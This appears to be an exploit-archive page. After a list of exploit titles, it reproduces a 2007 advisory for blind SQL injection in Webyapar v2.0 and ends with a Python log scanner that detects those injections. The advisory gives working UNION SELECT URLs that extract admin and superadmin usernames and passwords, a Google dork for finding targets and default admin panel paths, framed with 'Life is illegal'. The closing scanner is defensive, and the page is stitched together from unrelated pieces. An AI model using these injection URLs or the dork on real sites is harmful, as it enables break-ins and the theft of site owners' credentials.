
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow 
Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
##### TURKISH SECURITY MAN AND C0D3R ####################### MAIL : dumanhack@gmail.com ###########################
##### - ##### web : ##########
##### PERFECT C0D3R AND SECURITY ## >>>>>>>>>>>>>> MESSAGE : LIFE IS ILLEGAL <<<<<<<<<<<<<<< ##
#########################################################################################################################

# Title : webyapar v2.0 Remote Blind SQL Injection Vulnerability

# AUTHOR : bypass

# script name : Webyapar v2.0 { 700$ }

# Language : Tr

# script web page : www.webyapar.com

# script bug : remote SQL injection

# script admin panel1 : http://victim/script_path/yonetim

# script admin panel2 : http://victim/script_path/yonetim2

# google dork : inurl:"?page=duyurular_detay&id="

# Message Tr : My English is not very good. The script sells for 700$ on the market - besides SQL injection, the script also has XSS vulnerabilities,
but the XSS vulnerabilities will not be of much use to you. The admin panels are given as the default ones...

# Message Tr : Life is illegal - / -

< / -------------------------------------------------------------------------------------------------------- />

< / ------ Example sql bug 1 admin username : ------ / >

http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin

< / ------ Example sql bug 1 admin password : ------ / >

http://VİCTİM/SCRİPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin

< / ------ Example sql bug 2 superadmin password and admin username : ------ / >

http://VİCTİM/SCRİPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin

< / -------------------------------------------------------------------------------------------------------- />

SQL injection bug 1 : /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin

SQL injection bug 2 : /?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+admin

# milw0rm.com [2007-07-25]
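
From the defender's side, both injection points above are ID parameters (`kat_id`, `id`) that should only ever hold digits, so any other value in them is worth flagging. The following is an added example, not part of the original advisory or of the Webyapar code: it scans web server access-log lines for non-numeric values in those two parameters. The Common Log Format layout, the ten-digit limit, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory shows being injected; both carry numeric record IDs.
NUMERIC_PARAMS = {"kat_id", "id"}
INT_RE = re.compile(r"[0-9]{1,10}")  # assumed upper bound on ID length
# Keyword pairs typical of the UNION SELECT values shown in the advisory.
SQL_HINT_RE = re.compile(r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b", re.I | re.S)
# Common Log Format (assumed): client identd user [time] "METHOD target PROTO" ...
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')


def check_request(target):
    """Return [(param, reason)] for numeric parameters holding non-numeric data."""
    findings = []
    # parse_qsl percent-decodes and maps '+' to space, as the server would.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.lower() not in NUMERIC_PARAMS or INT_RE.fullmatch(value):
            continue
        reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-numeric"
        findings.append((name, reason))
    return findings


def scan_access_log(lines):
    """Return [(client, target, findings)] for log lines that need review."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        findings = check_request(m.group(2))
        if findings:
            hits.append((m.group(1), m.group(2), findings))
    return hits


# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jul/2007:10:00:01 +0000] "GET /?page=download&kat_id=12 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [25/Jul/2007:10:00:07 +0000] "GET /?page=download&kat_id=-116+union+all+select+0,sifre+from+admin HTTP/1.1" 200 4310',
    '198.51.100.9 - - [25/Jul/2007:10:00:09 +0000] "GET /?page=duyurular_detay&id=-50%20UNION%20ALL%20SELECT%200,kullanici,2,3,sifre,5%20FROM%20superadmin HTTP/1.1" 200 6022',
    "203.0.113.8 - - [25/Jul/2007:10:01:30 +0000] \"GET /?page=duyurular_detay&id=7' HTTP/1.1\" 500 310",
]

if __name__ == "__main__":
    for client, target, findings in scan_access_log(SAMPLE_LOG):
        print(client, findings, target)
```

The same digits-only check applied server-side before the value reaches the query, together with parameterized queries, removes the injection point rather than only detecting its use.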